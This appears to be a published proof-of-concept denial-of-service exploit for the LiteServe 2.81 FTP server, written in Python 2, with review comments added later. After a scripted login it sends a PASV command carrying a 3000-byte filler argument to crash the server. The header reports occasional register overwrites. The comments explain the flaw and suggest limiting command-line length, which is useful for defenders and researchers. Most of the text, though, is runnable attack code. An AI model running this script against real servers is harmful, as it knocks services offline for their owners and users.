#!/usr/bin/python
#Title: LiteServe 2.81 PASV Command DoS
#Author: Craig Freyman (@cd1zz)
#Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
#Tested on Windows XP SP3 and Server 2003 SP2
#Software: http://www.cmfperception.com/liteserve.html
#Notes: In certain conditions that I could not reproduce reliably, registers were
#overwritten. There are a number of other FTP commands that exhibit the same behavior.
import socket,sys,time,struct
# Python 2 syntax throughout (print statements); this will not parse under Python 3.
#
# What the script shows: after a USER/PASS exchange it sends one PASV command
# carrying a 3000-byte argument. PASV takes no argument in RFC 959, so the whole
# test is how the server's command parser copes with an over-long command line.
# The header reports a crash (DoS) and, unreliably, overwritten registers, which
# suggests an unchecked copy of the command line; the server code is not shown
# here, so that remains an inference.
#
# For defenders: the observable is a single FTP control-channel line far longer
# than any legitimate command. A maximum command-line length enforced by the
# server, or by a proxy/IDS in front of it, covers this command and the other
# commands the header says behave the same way.

# Require the target address as the first argument.
if len(sys.argv) < 2:
    print "[-]Usage: %s <target addr> " % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

# An optional second argument is stored, but nothing below ever reads it.
if len(sys.argv) > 2:
    platform = sys.argv[2]

# 3000 bytes of 0x41 ("A"): plain filler, no addresses or code are embedded.
pasv_argument = "\x41" * 3000

ftp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    ftp_sock.connect((target, 21))
except:
    # NOTE(review): bare except kept to preserve behaviour; it also traps
    # KeyboardInterrupt/SystemExit and reports every failure as a connect error.
    print "[-] Connection to " + target + " failed!"
    sys.exit(0)

print "[*] Sending " + repr(len(pasv_argument)) + " byte crash..."

# Login exchange. Replies are read and discarded, never inspected, so the script
# does not establish whether a successful login is needed to reach the PASV
# handler. Confirm against the server before assuming it is post-auth only.
for login_command in ("USER test\r\n", "PASS test\r\n"):
    ftp_sock.send(login_command)
    ftp_sock.recv(1024)

# The over-long PASV line; no reply is read afterwards.
ftp_sock.send("PASV " + pasv_argument + "\r\n")

# Hold the connection open for five seconds before closing (the script gives no
# reason; presumably to let the server process the line).
print "Sleeping..."
time.sleep(5)
ftp_sock.close()